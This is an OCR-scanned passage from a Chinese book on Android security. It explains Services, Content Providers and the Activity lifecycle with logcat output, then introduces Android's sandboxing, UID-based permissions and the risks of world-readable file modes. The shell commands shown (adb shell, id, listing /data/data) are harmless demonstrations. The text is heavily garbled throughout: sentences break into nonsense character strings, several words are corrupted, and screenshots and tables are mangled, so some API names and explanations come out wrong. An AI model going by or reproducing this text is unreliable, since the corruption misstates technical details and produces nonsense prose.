应 用 程序 组 件 可 以 调用 startService ( ) 函数 启动 一 个 Service， 此 时 该 Service 处 
于 “启动 ”状态 。 只 要 Service 被 启动 ， 就 会 在 后 台 运 行 ， 甚 至 当 启 动 它 的 组 件 或 
所 在 的 应 用 程序 不 再 运行 后 ，Service 仍 将 继续 运行 。 

应 用 程序 组 件 可 以 调用 bindService( ) 函数 绑 定 到 Service 上 ， 绑 定 的 Service 通 
常 被 用 作客 户 端 / 服 务 器 机 制 ， 同 应 用 程序 组 件 进 行 交 互 。 绑 定之 后 ，Service 同 与 
其 绑 定 的 组 件 一 同 运行 。 一 旦 解 贿 ，Service 即 终止 销毁 。 所 有 的 应 用 程序 组 件 或 
其 他 应 用 程序 只 要 取得 所 需 权 限 ， 都 可 以 通过 Intent 启动 或 绑 定 一 个 Service, 

自 定 义 的 Service 必须 要 继承 Service 基 类 ， 并 且 实 现 基 类 中 相应 的 回调 函数 。 
Service 类 中 几 个 重要 的 回调 函数 包括 : onStartCommand( ) , onBind( ) , onCreate( ) 
和 onDestroy( ) 。 
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€ onStartCommand( ) 

当 其 他 应 用 程序 组 件 调用 startService ( ) PRU 2JJ Service EE, 1% El 8] PLC H S 
统 调用 。 随 后 ，Service 开始 运行 ， 直 到 stopSelf( ) PK/ZI s, stopService( ) 函数 被 调用 
时 终止 。 

€ onBind( ) 

当 其 他 应 用 程序 组 件 调用 bindService( ) 函数 同 Service 绑 定 时 ， 回 调 该 函数 。 

9 onCreate( ) 

当 Service 首次 创建 时 ， 回 调 该 函数 执行 初始 化 设置 。onCreate( ) 函数 在 on- 
StartCommand( ) 或 onBind ( ) 函数 调用 之 前 执行 。 

@ onDestroy( ) 

Service 不 再 需要 时 ， 回 调 该 函数 。 

需要 注意 的 是 ， 当 Android 需要 回收 系统 资源 时 ， 系 统 会 终止 Service。 例 如 ， 
在 系统 内 存 空间 不 足 的 情况 下 。 同 其 他 组 件 一 样 Service 也 需要 在 Manifest. xml 文 
件 中 声明 。 在 Manifest. xml 文件 内 使 用 < application > 的 子 标签 < service > 声明 Serv- 
ce， 如 代码 段 4 所 示 。 其 中 ，android: name 属性 指定 声明 的 Service 类 名 ， 如 果 
Service 中 定义 了 Intent 过 滤器 ， 那 么 其 他 应 用 程序 也 可 以 通过 隐 式 类 型 的 Intent 激 
活该 Service。 











<manifest> 


«application .> 
«service android:name -".ServiceName /> 


«/application» 
«/manifest» 


代码 段 4 Service TE Manifest 文件 中 声明 


同 其 他 应 用 程序 组 件 一 样 ， 可 以 使 用 < service > 标签 内 定义 的 权限 限制 应 用 程 
序 对 该 Service 的 启动 或 绑 定 。 当 应 用 程序 调用 Context. startService ( ) , Context. 
stopService( ) 或 Content. bindService( ) 函数 操作 目标 Service 时 ， 系 统 会 检测 调用 者 
权限 ， 如 果 调 用 者 没有 所 需 的 权限 ， 则 拒绝 相应 操作 的 请 求 。 


3.1.5 Content Provider 


Content Provider 提供 了 一 种 不 同 应 用 程序 之 间 共 享 持久 数据 的 方式 ， 
Content Provider 都 可 以 看 作 一 个 数据 仓库 ， 其 他 应 用 程序 可 以 通过 定义 Content Pro- 
vider 访问 这 些 数 据 。 虽 然 应 用 程序 可 以 使 用 Intent 共享 数据 ， 但 是 对 于 一 些 敏感 或 
持久 性 的 数据 来 说 ,使 用 Intent 对 象 传递 并 不 合适 。 因 此 ，Content Provider 旨 在 解 
决 该 问题 。Content Provider 和 Content Provider 的 客户 端 采 用 一 种 标准 的 接口 实现 数 
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据 共 享 的 安全 性 和 高 效 性 。 例 如 ，Android 系统 的 Contact Provider (联系 人 信息 
HEZE) o Android 系统 上 内 置 了 默认 的 联系 人 应 用 软件 ， 能 够 访问 Contact i 
不 过 ,开发 者 也 可 以 编写 具有 不 同 UI 界面 布局 的 联系 EE , JÅ Contact Pro- 
vider 获取 相同 的 数据 。 因 此 ， 任 何 应 用 程序 对 联系 人 信息 的 改动 ， 都 会 被 所 有 访 
间 Contact Provider 的 应 用 程序 获取 。 应 用 程序 可 以 通过 调用 ContentResolver( ) 函数 
访问 Content Provider 的 数据 。 

同 其 他 应 用 程序 组 件 一 样 ，Content Provider 也 需要 在 Manifest. xml. 文件 中 声明 。 
在 provider > 标签 内 可 以 定义 Content. Provider 的 权限 ， 如 android; readPermission 和 
android; writePermission 权限 ， 控 制 其 他 应 用 程序 组 件 能 够 在 Content Provider 上 执行 
的 操作 类 型 。 当 应 用 程序 调用 Content. Resolver. query( ) Content. Resolver. insert( ) 、 
Content. Resolver. update( ) 和 Content. Resolver. delete ( ) 图 数 对 Content. Provider 的 数 
据 进行 操作 时 ， 系 统 会 查看 其 操作 权限 ， 没 有 权限 则 操作 请 求 被 拒绝 。 

















3.2 Activity 生命 周期 





在 本 章 前 面部 分 ， 已 经 介绍 了 Activity 的 相关 内 容 ， 并 且 讨 论 了 需要 在 Activity 
中 实现 的 回调 函数 ， 包 括 onCreate( ) 、onPause( ) 、onStart( ) 、onRestart( ) 、onRe- 
sume( ) onStop( ) 和 onDestroy( ) 。 接 下 来 ， 本 节 将 稍 加 详细 地 介绍 一 下 Activity 的 

命 周期 。 

如 前 所 述 ，Activity 是 与 用 户 进行 交互 的 UL 屏幕 界面 ， 应 用 程序 往往 包含 多 个 
Activity， 用 户 可 以 在 不 同 的 Activity 之 间 无 颖 地 切换 ， 也 可 以 使 用 Intent 对 象 启 
动 其 他 应 用 程序 的 Activity。 因 此 ， 了 解 Activity 的 生命 周期 至 关 重 要 。 尤 其 对 于 
应 用 开发 者 ， 需 要 实现 Activity 切换 或 终止 时 回调 的 特定 函数 的 操作 细节 。 如 果 
Activity 所 需 的 回调 函数 没有 实现 ， 很 可 能 导致 应 用 程序 出 现 性 能 和 /或 可 靠 性 方 
面 的 问题 。 

Activity 栈 用 于 维护 管理 Android 应 用 程序 的 Activity 组 件 。 用 户 在 使 用 应 用 程 
序 时 ，Activity 会 经 历 生 命 周 期 的 不 同 状态 。 例 如 ， 新 的 Activity 启动 后 将 被 放置 在 
当前 任务 Activity 栈 的 顶部 ， 并 且 获 得 用 户 焦点 、 进 入 运行 状态 ， 而 之 前 的 Activity 
入 栈 ,位 于 新 Activity 之 下 。 系 统 会 根据 Activity 的 不 同 状态 调用 Activity 生命 周期 
中 相应 的 回调 函数 。 如 当 一 个 Activity 回 到 前 台 、 获 得 用 户 焦 点 时 ， 系 统 将 调用 
onCreate( ) , onRestart( ) , onStart( ) 或 onResume( ) 图 数 ， 而 当 Activity 失去 焦点 、 
进入 后 台 时 ， 系 统 将 调用 另 一 组 回调 函数 ， 如 onPause( ) 等 。 

e 激活 /运行 状态 : 当 Activity 进入 屏幕 前 台 ， 并 获得 用 户 焦点 时 ， 处 于 该 状 
Ao XH, Activity 位 于 当前 任务 堆栈 的 顶部 ， 响 应 用 户 操作 。 

e 暂停 状态 ， 当 Activity 上 面 出 现 另 一 个 Acetivity， 使 其 失去 焦点 但 仍然 对 用 户 
可 见 时 ， 处 于 暂停 状态 。 在 它 之 上 的 Activity 没有 完全 覆盖 屏幕 ， 或 者 是 透明 的 ， 
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被 暂停 的 Activity 仍 保留 着 所 有 的 状态 和 成 员 信 息 ， 不 过 ， 如 果 系 统 处 于 内 存 空间 
不 足 时 ， 系 统 会 “ 杀 死 ”该 状态 Activity， 回 收 空间 资源 。 

e 停止 状态 : 当 Activity 完全 被 另 一 个 全 屏 Activity 覆盖 时 ， 处 于 停止 状态 ， 它 
仍然 保留 所 有 的 状态 和 成 员 信息 。 然 而 对 用 户 是 不 可 见 的 ， 所 以 它 的 窗口 将 被 隐 
藏 ， 在 系统 内 存 不 足 时 ， 经 常会 “ 杀 死 ”这 样 的 Activity, 

e 不 活跃 /终止 的 状态 Activity 处 于 暂停 或 终止 状态 ， 系 统 往往 会 根据 资源 
情况 “ 杀 死 ”这 样 的 Activity， 回 收 空间 资源 。 当 该 Activity 重新 启动 时 ， 需 要 重新 
初始 化 状态 和 成 员 信息 。 

Activity 生命 周期 状态 转换 流程 如 图 3.6 所 示 ， 图 中 直角 和 矩形 表示 Activity 状态 
转换 时 需要 实现 的 回调 函数 ， 圆 角 抢 形 表示 Activity 的 不 同 状态 。 


Y 
OnCreate() 








WERTE — 


Activi 人 


OnResume( — — — M ——À 


另 一 个 Activity 进 入 前 台 显 示 


RIAR l 
VIRES 用 户 重新 问 到 读 
MAERA -— ——— 


应 用 程序 需要 内 存 











用 户 重新 打开 该 
y Activity 














该 Activity 终 止 或 被 系统 销毁 


y 


1 








3.6 Activity 生命 周期 和 回调 函数 


Activity 在 销毁 之 前 ， 可 能 会 经 历 多 次 激活 或 不 活跃 CELER) 状态 。 每 次 切换 ， 
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系统 会 根据 Activity 的 状态 转换 调用 对 应 的 回调 函数 ， 下 面 以 三 种 时 间 顺 序 对 Ac- 
tivity 生命 周期 进行 分 析 。 

e 完整 生命 周期 : Activity 的 完整 生命 周期 自 第 一 次 调用 onCreate( ) 函数 开始 ， 
直到 onDestroy( ) KOSHER, WHEN T Activity 所 有 的 状态 变换 。 在 onCreate( ) K 
数 中 ， 主 要 实现 对 Activity 的 状态 和 资源 的 配置 ， 完 成 初始 化 。 而 在 onDestroy ( ) PR 
数 中 ， 主 要 实现 对 Activity 占用 资源 的 释放 。 

e 可 见 生 命 周 期 : 对 应 Activity 在 屏幕 上 显示 的 这 段 时 间 ， 以 调用 onStart( ) PR 
数 开 始 ， 直 到 onStop( ) 函数 调用 结束 。 期 间 ， 尽 管 Activity 对 用 户 来 说 是 可 见 的 ， 
但 用 户 未 必 就 能 与 之 进行 交互 。 

e 前 台 生 命 周期 : 该 周期 内 ， 用 户 能 够 同 Activity 进行 交互 ， 以 onResume( ) K 
数 调用 开始 ， 直 到 onPause( ) 函数 调用 结束 。 

表 3. 3 介绍 了 Activity 生命 周期 中 主要 的 回调 函数 。 


表 3.3 Activity 生命 周期 回调 函数 















































































































































mo 5 说 — Hj 
onCreate( ) Activity 第 一 次 启动 时 调用 ， 执 行 初始 化 操作 
onRestart( ) 之 前 停止 的 Activity, ， 回 到 屏幕 前 台 、 重 新 开始 时 调用 
onStart( ) Activity 进入 屏幕 前 台 ， 能 够 被 用 户 可 见 时 调用 
onResume( ) Activity 进入 屏幕 前 台 ， 能 够 和 用 户 交互 时 调用 
—— 系统 恢复 之 前 暂停 的 Activity， 当 前 Activity 进入 暂停 状态 时 调用 ， 通 常 需要 在 该 
函数 中 保存 当前 操作 的 结果 
onStop( ) Activity 不 可 见 时 调用 
onDestroy( ) 系统 销毁 Activity ， 释 放 资 源 时 调用 














下 面 通过 运行 一 个 应 用 程序 了， 查看 并 分 析 Activity 的 生命 周期 。 为 了 让 该 应 
用 程序 能 够 将 运行 信息 输出 到 Logcat 窗口 ， 作 者 对 应 用 程序 的 部 分 源码 进行 了 修 
改 。 该 应 用 程序 由 三 个 不 同 的 Activity ( 即 UI 屏幕 显示 界面 ) 构成 : Activity A, 
Activity B 和 Activity C， 如 图 3.7 所 示 。 用 户 可 以 使 用 界面 上 的 按钮 在 不 同 的 Activ- 
ity 之 间 切 换 ， 切 换 时 系统 将 调用 对 应 的 回调 函数 ， 并 将 之 前 运行 的 Activity ÆA HE 
栈 。 当 然 ， 用 户 也 可 以 返回 到 之 前 运行 的 Activity 界面 。 下 面 ， 使 用 该 示例 程序 ， 
按照 如 下 顺序 切换 Activity 屏幕 显示 界面 进行 测试 : 依次 启动 Activity A, Activity B 
和 Activity C， 然 后 再 依次 返回 到 之 前 的 Activity B 和 Activity A。 通 过 Logcat 窗口 ， 
可 以 看 到 Activity 生命 周期 内 相应 函数 的 调用 信息 。 

Activity Lifecycle 应 用 程序 演示 介绍 : 

1) 由 于 Activity A 是 该 应 用 程序 的 主 Activity。 因 此 ， 当 应 用 程序 打开 时 ，Ac- 
tivity A 随 之 启动 。 如 图 3. 8 所 示 ，Activity EEA 2] Activity A 后 ， 该 Activity 内 



































”该 应 用 程序 名 为 Activity Lifecycle, 读者 可 从 developer. android. com 网 站 自行 下 载运 行 。 一 一 原 书 注 
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Activity Lifecycle Activity Lifecycle 
Activity A Activity B 
mano f oczom 


Lifecycle Method List Lifecycle Method List 


Activity A.onResume() i A.onStop() 

Activity A.onStart() ivity B.onResume() 

Activity A.onCreate() i B.onStart() 
B.onCreate() 
A.onPause() 
A.onResume( ) 
A.onStart() 
A.onCreate() 


Activity Status 


Activity A: Resumed Activity A: Stopped 
Activity B: Resumed 


Activity Lifecycle 


Activity B.onStop() 
Activity C.onResume() 
Activity C.onStart() 
Activity C.onCreate() 
Activity B.onPause() 
Activity A.onStop() 
Activity B.onResume() 
Activity B.onStart() 
Activity B.onCreate() 


Activity B: Stopped 
Activity C: Resumed 
Activity A: Stopped 





3.7 Activity Lifecycle 应 用 程序 截图 


对 应 的 回调 函数 调用 顺序 为 onCreate( ) , onStart( ) 和 onResume( ) 。 

2) 点 击 “Start B” 按 钮 ， 启 动 Activity B。 如 图 3. 9 所 示 ， 查 看 Logcat 窗口 可 
Jh, Activity A 先是 调用 了 onPause( ) 函数 ， 随 后 被 压 人 堆栈 。 随 即 Activity 管理 需 
启动 Activity B, onCreate( ) , onStart( ) 和 onResume( ) 函数 依次 被 调用 。 一 旦 Activ- 
ity B 进入 到 屏幕 前 台 显示 ，Activity A 即 调用 onStop () 函数 。 从 图 3. 10 中 可 见 ， 
Activity B 切换 到 Activity C 时 ， 函 数 调 用 顺序 相同 。 


EE 
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| EGS: Settings 
| ActivityManager 















system pro: 
| eam. google .pr. 
| com.gcogle.pr. 


| generated. scanline | 00000077: 03515104 | 29000000 ， 00000000 I 38 ipp] (47 ins) 
No keyboard for id 0 






~ | KeyCharacterMap 
| KeyCharacterMap 





system process 
system process. 
| com.android.c. 

com.android.c. 


yRA4df45E0 (uide1000 


InputMethodClient$Stub$Proxy844e27528 (ui 


















[Ne keyboard for id 0 
(Nein default keymap: 








yCharacterMap 
yCharacterMap 
HewPlipper ——— 
| VieuFlipper 

| InpusManagerser.. 












Jaysven/usr/keychars/querty.kcm. á 
e, mhunning-false 
mRunning-false 

InputMetbodClient$StubsProxyR44df48f0 (uid=1000 





| Starting input on non-fo 























E " | ViewFlipper  (updateRunning() mVisible-false, mStarted-false, müserPresent-true. 5 hi 
38 com.android.i... |ViewFlipper updateRunning() mVisible-false, mStarted-false, mÜserPresent-true, mRunning-false  ž  ž  ž  ž  žć žć žc ž 
51 | system | process |ActivityManager Starting activity: Intent { act-android.intent action MAIN cat-[android. intent. category. LAUNCHER] flg=0x1020000 
| Activity | OnStart 
i |Aesivisyh OnRasume j mcs RUN CIEN e T RE x : 
51 | system process | ActivityManager Displayed activity com.example.android.lifecycle/.ActivityA: 564 ms (total 564 ms) De 
104  android.proce... |dalvikvm (SC freed 1363 objects / 83848 bytes in 180ms 


图 3. 
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| system process 


InputManagerSer... 
KeyCharacterMap 


Starting input on non-focused client com android internal view. IInputMethodClient$St 
[ne keyboard for id 0 














com.example.a... 





enc. 











564 ms (total 564 ms) 





Gc reed 1363 objects $ 83848. à bytes in 180ma 











ActivityB | 









| OE UNE 




















Starting activity: Intent { Bact-android.intent.action.MAIN cat-[android.intent.category.I 





ActivityA 















































ActivityA OnResume 25 
ActivityManager Displayed activity com.example.android.lifecycle/.ActivityA: 564 ms (total 564 ma) 
dalvikvm GC freed 1363 objects / 83848 bytes in 180ms 
ActivityManager Starting activity: Intent [ emp-com.example.android lifecycle/.ActivityB } 
ActivityA OnPause Y 
AcvivityB OnCreate 
AcvivityB OnStart 
ActivityB OnResume 

system proc |ActivityManager Displayed activity com.example.android lifecycle/.ActivityB: 506 ms (total 506 ms) 









































C 调用 onPause( 


[51 | system process ^ ActivityManager ^ |Starting actijgai Intent ( cmpccom example andrcid.lifecycle/. ActivityC } 

200 ActivicyB OnPause AIRAA i s 

200 Activit: OnCreate 

200 ActivityC OnStart 

200 ActivityC OnResume T 

51 ActivityManager Displayed activity com.example.android.lifecycle/ ActivityC- 468 ms (total 468 ms) 
] 200 ActivityB OnStop vi 

200 dalvikvm GC freed 5355 objecta / 322776 bytes in 103ms 


3.10 Activity Lifecycle; Activity C 启动 


3) 点 击 Activity C 界面 上 的 “Finish C” 按 钮 。 如 图 3. 11 所 示 ， 首 先 Activity 


) 函数 ， 


然后 Activity 栈 内 的 Activity B 被 启动 。 当 Activity B 回 到 屏 
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幕 前 台 时 ，Activity C 依次 调用 onStop( ) P 


数 中 ，Activity C 占 


用 的 系统 


函数 和 onDestroy( ) 图 数 。 在 onDestroy( ) PK 


资源 被 释放 。 在 Activity B 界面 上 点 击 “Start A" E 


启动 oiii: A 时 ， 对 应 回调 函数 调用 顺序 相同 ， 如 图 3. 12 所 示 。 


system process ES E 
| com: example. 


lays tem process 











图 3.11 


Activity Lifecycle: 








/.ActivityC: 468 ms (total 468 z 








Activity C 终止 


| system process 


.AetivityMenager — 


ing activity - Intent { cmp-com. example. android. lifecycle/. 







































































































200 |com.example.a... |ActivityB E OnDause e. E: E d 
200 | com. example. BAF 1 Pate D M e i 
200 com.example.a ETT E. i A E 
200. | com. example a i 
81 system process |ActivityManager 5 Displayed activity com. -example. android. lifecycle/. ActivityC: 4i 
200 com. example.a... s ActivityB punstep ipo ^ i x z 
200 | com.example.a... | GC freed ， 6355 objects / 322776 bytes in 103ms — 
200 | com. example. a. | OnPause z iu wes E Ee. 
200 |com. example.a Rest IE 区 1r Lon iE js 人 
200 com. example. a. z I ApkivityB jm [OnStart - L ER 2 = aU 
200 | com.example.a... | Ero | 9OnResume Hr : E 
200 |com.example.a... ActivityC — anae o TIG: DOC GUUER = 
200 | com. example.a. ActivityC | OnDestroy 

HILL. pen 





1l com. example.a. 





















200 | com.example.a. 
200 | | com. examp. 
200. Qe eeu. 


3.3 


小 结 


图 3. 12 Activity Lifecycle; Activity A 启动 














本 章 详细 讨论 了 Android 应 用 程序 组 件 ， 包 括 Activity 、Broadcast Receiver 、Content 
ibn 和 Service。 研 究 了 用 于 应 用 程序 内 部 组 件 之 间或 不 同 的 应 用 程序 之 间 实 现 交 互 





消息 体 





组 件 、 组 





Intent。 随 后 ， 又 探讨 了 nid 的 生命 周期 ， 以 及 在 Activity 内 需要 实现 
-a 回调 函数 。 通 过 本 章 的 介 


读者 应 当 能 够 了 解 主要 的 Android 应 用 程序 





28, 


组 件 之 间 的 交互 过 程 ， 以 及 Activity 生命 周期 内 的 主要 回调 函数 。 


第 4 章 Android 安全 机 制 


本 草 主 要 讨论 Android 系统 的 安全 机 制 ， 包 括 系统 平台 级 的 安全 机 制 和 应 用 层 
的 安全 机 制 。 通 过 第 2 章 的 介绍 ， 读 者 应 当 已 经 熟悉 了 Android 系统 的 体系 结构 ， 
并 且 通 过 第 3 章 的 介绍 ， 掌 握 了 Android 应 用 程序 的 基础 知识 ， 如 程序 的 组 成 模 
块 、 程 序 框架 等 。 本 章 基 于 对 上 述 Android 系统 平台 和 应 用 层 的 理解 ， 主 要 介绍 
Android 具有 的 安全 特性 ， 以 及 Android 程序 组 件 使 用 的 各 种 进程 间 通 信 ( Interpro- 
cess Communication, IPC) 机 制 2 。 





4.1 Android 安全 模型 


Android 系统 的 开发 人 员 已 经 在 Android 平台 的 设计 中 引入 了 安全 机 制 。An- 
droid 系统 强制 所 有 的 Android 应 用 程序 使 用 双 层 安全 模型 。 在 Android 底层 核心 ， 
依靠 Linux 内 核 提供 的 安全 特性 ， 即 每 一 个 Android 应 用 程序 作为 单独 的 进程 运行 ， 
其 他 进程 不 能 干扰 其 运行 ， 并 且 每 个 应 用 程序 拥有 自己 的 一 组 数据 结构 。 

在 应 用 层 ，Android 系统 采用 更 加 细 化 的 权限 设置 允许 (或 禁止 ) 应 用 程序 或 
组 件 同 其 他 应 用 程序 组 件 交 互 ， 或 对 关键 资源 的 访问 。 应 用 程序 需要 得 到 用 户 的 批 
准 才能 访问 关键 业务 ， 如 拨打 电话 、 发 送 短信 等 ， 并 且 需 要 “ 显 式 ”地 请 求 所 需 
权限 ， 相 应 操作 才能 成 功 执行 。 默 认 情 况 下 ， 应 用 程序 不 能 执行 任何 可 能 对 其 他 应 
用 、 用 户 资料 或 系统 不 利 的 操作 ， 如 发 送 短信 息 、 读 取 联 系 人 信息 和 访问 网 络 等 。 
播放 音乐 或 浏览 照片 不 属于 上 述 操作 ， 应 用 程序 无 需 “ 显 式 ” 地 请 求 这 些 操作 的 
权限 。 应 用 程序 级 别 的 权限 设置 提供 了 一 种 对 受 限 内 容 的 访问 机 制 和 对 受 限 API 的 
调用 机 制 。 

每 一 个 Android 应 用 程序 (或 组 件 ) 都 运行 在 一 个 独立 的 Dalvik 虚拟 机 上 ， 这 
样 就 形成 了 一 个 安全 沙 箱 。 但 是 ， 不 能 假设 这 样 的 沙 箱 就 一 定 能 够 确保 安全 。 为 了 
ERARE E BE UE ESAE TT, Dalvik 虚拟 机 经 过 优化 后 仅 占 有 很 小 的 空间 资 
源 。 打 破 这 种 由 虚拟 机 构成 的 安全 沙 箱 并 不 是 没有 可 能 。 因 此 ， 并 不 能 完全 依靠 它 
来 确保 安全 。 鉴 于 此 ，Android 的 权限 检查 没有 放 在 Dalvik 虚拟 机 中 实现 ， 而 是 放 
在 Linux 内 核 代 码 中 ， 在 运行 时 强制 执行 。 



























































O ”不同 的 应 用 程序 和 进程 之 间 通 过 IPC 机 制 彼此 通信 共享 数据 或 信息 。 例 如 ， 在 Linux 系统 上 ， 信 号 就 
是 一 种 IPC 通信 方式 。 一 一 原 书 注 














52 Android 系统 安全 与 攻防 





在 Android 系统 的 安全 方面 ， 底 层 Linux 设备 资源 的 访问 ， 主 要 通过 验证 用 户 和 群 
组 ID 来 确保 安全 。 同 时 ，Manifest 的 权限 设置 ， 又 提供 了 男 一 种 更 加 细 化 的 安全 特性 。 











4.2 Linux 权限 机 制 


Android 系统 为 每 一 个 新 安装 的 应 用 程序 分 配 一 个 唯一 的 UID. (User ID ， 用 户 
ID) 和 一 个 GID (Group ID ， 群 组 ID ) 。 每 一 个 安装 的 应 用 程序 都 有 一 组 与 UID 和 
GID 关联 的 数据 结构 和 文件 。 只 有 应 用 程序 本 身 (通过 其 UD) 或 超级 用 户 (B 
root 用 户 ) 具有 访问 这 些 数据 和 文件 的 权限 。 其 他 应 用 程序 不 具有 超级 用 户 的 权限 
(当然 ， 也 不 能 赋予 它们 该 权限 ) ， 因 此 不 能 访问 其 他 应 用 程序 的 文件 。 当 应 用 程 
序 需要 同 其 他 应 用 程序 或 组 件 共 享 信息 时 ， 则 通过 在 应 用 层 采 用 MAC ( Mandatory 
Access Control， 强 制 访 问 控制 ) 安全 模型 实现 ， 这 部 分 内 容 将 在 下 一 节 详 细 讨 论 。 

在 Android 系统 上 ， 两 个 应 用 程序 有 可 能 共享 同一 个 UID 或 运行 在 同一 个 进程 
中 ， 这 是 因为 它们 使 用 了 相同 的 密 钥 获 得 签名 (有 关 应 用 程序 签名 的 部 分 内 容 请 
查阅 相关 内 容 ) 。 因 此 ， 对 于 应 用 程序 开发 人 员 来 说 ， 保 证 签名 密 钥 的 安全 性 至 关 
重要 。 每 一 个 Android 应 用 程序 都 在 单独 的 进程 中 运行 ， 并 且 每 一 个 进程 拥有 自己 
的 UID， 这 样 就 使 应 用 程序 之 间 彼 此 沙 箱 化 。 从 而 ， 使 应 用 程序 能 够 调用 本 地 代码 
(以 及 使 用 本 地 库 ) ， 而 将 安全 问题 交 由 Android 系统 处 理 ， 无 需 担 忧 安全 隐患 。 

需要 注意 的 是 ，Linux 是 一 个 多 用 户 、 多 任务 的 操作 系统 ， 而 Android 系统 面 
向 提供 单 用 户 的 体验 。 通 过 Linux 的 权限 机 制 ，Android 应 用 程序 采用 Linux 中 用 于 
多 用 户 的 安全 模型 确保 系统 安全 。 

图 4. 1 所 示 和 截屏 显 示 的 为 连接 到 Android 模拟 器 的 用 户 UID， 其 中 该 用 户 的 
UID 和 GID 都 为 0。 在 类 UNIX 的 环境 中 都 是 这 样 的 ， 表 示 该 用 户 为 超级 用 户 ， 相 
当 于 传统 Windows 系统 中 的 Administrator (系统 管理 员 ) 。 超 级 用 户 可 以 执行 任何 
操作 ， 访 问 所 有 的 文件 。 

需要 注意 的 是 ， 使 用 adb 工具 在 模拟 器 上 启动 的 shell 程序 2 将 赋予 用 户 root 权限 
( 即 超级 用 户 权 限 ) 。 然 而 ， 如 果 在 相连 接 的 手机 设备 上 重复 上 述 同 样 的 测试 ， 则 
用 户 只 能 获得 “system” 或 “shell” 用 户 权 限 ， 除 非 用 户 已 经 在 该 手机 上 进行 了 


















































O Shell 程序 俗称 过 〈 区 别 于 核 ) ， 是 指 “ 提 供 使 用 者 使 用 的 界面 ”的 程序 。 类 似 于 DOS 下 的 command 
和 后 来 的 cmd. exe 程序 (命令 提示 符 窗口 )。 用 于 接收 用 户 命 令 ， 然 后 调用 相应 的 应 用 程序 。 基 本 上 
shell 分 两 大 类 : 图形 界面 shell 和 命令 行 式 shell。 传 统 意义 上 的 shell 指 的 是 命令 行 式 的 shell, DAJAN 

果 不 特别 注 明 ，shell 是 指 命令 行 式 的 shell, Android 系统 Shell 程序 可 通过 adb 工具 在 相连 的 Android 

设备 或 模拟 器 上 启动 ， 作 为 设备 或 模拟 器 Android 系统 底层 Linux 内 核 最 外 面 的 一 层 ， 控 制 用 户 与 操 

作 系 统 之 间 的 交互 ， 即 等 待 用 户 输入 ， 向 操作 系统 解释 用 户 的 输入 ， 并 且 处 理 各 种 各 样 的 操作 系统 

的 输出 结果 。 一 一 译 者 注 
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€ » 
' root 


pentestusrietools-gibbons-vm-2:-$ adb shell 
# id 


uide8(root) gid-6(root) 
# 





图 4.1 ERMi ETT id 命令 





处 理 。 
每 一 个 Android 系统 上 的 应 用 程序 在 /data/data 目录 下 都 有 各 自 的 文件 夹 。 如 





图 4.2 所 示 ， ee ed ae i end Mae te ss 


所 属 











OT cu 





从 图 4.2 可 见 ， 用 户 app 1 (也 就 是 应 用 程序 htmlviewer) 拥有 自己 的 文件 夹 





com. android. htmlviewer。 因 此 ， 没 有 权限 访问 用 户 app_5 拥有 的 com. android. music X 
件 夹 内 部 的 文件 。 


pentestusrlétools-gibbons-vm-2:-$ adb shell 

* cd /data/data 

# ls ~1 

drwxr-x--x app.1i app..1 2011-09-28 02: com.android.htmlviewer 
drwxr-x--x app.2 app.2 2011-09-28 02:52 com.android.quicksearchbox 
drwxr-x--x app.3 app.3 2011-09-28 02: com.android.defcontainer 
drwxr-x--x system system 2011-09-28 02:52 com.android.server.vpn 
drwxr-x--x app.5 app_5 2011-09-28 02:53 com.android.music 

drwxr-x--x app.6 opp_6 2011-09-28 02:53 com.android.providers.applications 
drwxr-x--x app.? app.7 2011-09-28 02:53 com.android.wallpaper.livepicker 
drwxr-«x--x app.8 app..8 2011-09-28 02:53 com.android. fallback 

drwxr-x--x app.9 app.9 2011-09-28 22: com. svox. pico 

drwxr-x--x app.i9 X app.19 2011-09-28 02:53 com.android.inputmethod.ilatin 
drwxr-x--x app.il  app.1i 2011-09-28 02:53 android.tts 

drwxr-x--x app.l2 app_12 2011-09-28 02:53 .android.soundrecorder 
drwxr-x--x app.6 opp_6 2011-09-28 02:53 .android,inputmethod.pinyin 
drwxr-x--x app.e [ro 2011-09-28 02: .android.providers downloads .Ui 
drwxr-x--x app. [99] 2011-09-28 02: .android,.galiery 

drwxr-x--x system system 2011-09-28 02: .android.providers.subscribedfeeds 
drwxr-x--x app.9 app. 2011-09-28 02: .android.providers.drm 
drwxr-x--x app.i4 | app.14 2011-09-28 02: .android.customlocale 
drwxr-x--x app.i6 | app.16 2011-09-28 02: .android.spare parts 
drwxr-x--x app.i7  app.17 2011-09-28 02: .android,.speechrecorder 
drwxr-x--x app.18 — app.18 2011-09-28 02: .android,term 

drwxr-x--x app.21 app.21 2011-09-28 902: .android.packageinstaller 
drwxr-x--x app.22 — app.22 2011-09-28 02: .aündroid.certinstaller 
drwxr-x--x app.23 app.23 2011-09-28 02: .android.netspeed 

drwxr-Xx~~X system system 2011-09-28 02: android, systemui 

draxr-x--x app.6 app_e . 4011-09-28 3 .üandroid.contacts 

drwxr-x--x app.24 . app.24 2011-09-28 92: Ordroid,.protips 

drwxr-x--x app.25 — app.25 2011-09-28 92: „android, camera 

drwxr-x--x app.26 app_26 2011-09-28 : .android.sdksetup 

drwxr-x--x app.27 | app.27 2011-09-28 02: .android.calculator2 
drwxr-x--x app.29 — app.29 2011-09-28 02: om. android.development 
drwxr-x--x system system 2011-09-28 92: .android.providers,settings 
drwxr-x--x app.6 Opp- 和 6 2011-09-28 92: .android.providers.contacts 
drwxr-x--x radio radio 2011-09-28 02: „android. phone 


图 4.2 /data/data 目录 下 执行 ls 命令 查看 目录 所 属 关系 

















当 Android 应 用 程序 调用 getSharedPreferences ( ) openFileOutput ( ) 或 ope- 





nOrCreateDatabase( ) 函数 创建 文件 时 ， 可 以 使 用 MODE_WORLD_READABLE 和 /或 
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MODE. WORLD. WRITEABLE 标志 。 不 过 ， 如 果 程 序 开 发 人 员 没 有 谨慎 地 设置 这 两 
个 标志 ， 则 将 会 导致 其 他 应 用 程序 能 够 计 赤 写 该 应 用 创建 文件 ， 即便 这 些 文件 仅 属于 
该 应 用 程序 。 

应 用 程序 的 UID 是 该 程序 运行 时 所 在 进程 拥有 者 的 ID， 它 可 以 访问 同属 该 


DID 的 种 种 本 地 文件 ， 而 让 其 他 的 进程 不 和 BE 访问 这 些 文件 。 其 他 程序 只 有 通过 IPC 
机 制 才 可 以 与 其 通信 。 每 一 个 进程 在 运行 时 拥有 自己 的 地 址 空间 ， 以 及 堆栈 等 

2505 4 5: d cu 
截图 如 图 4.3 所 示 。 从 图 中 可 见 ， 每 一 个 进程 (也 就 是 应 用 程序 ) 都 从 属于 一 
对 应 的 用 户 UID。 











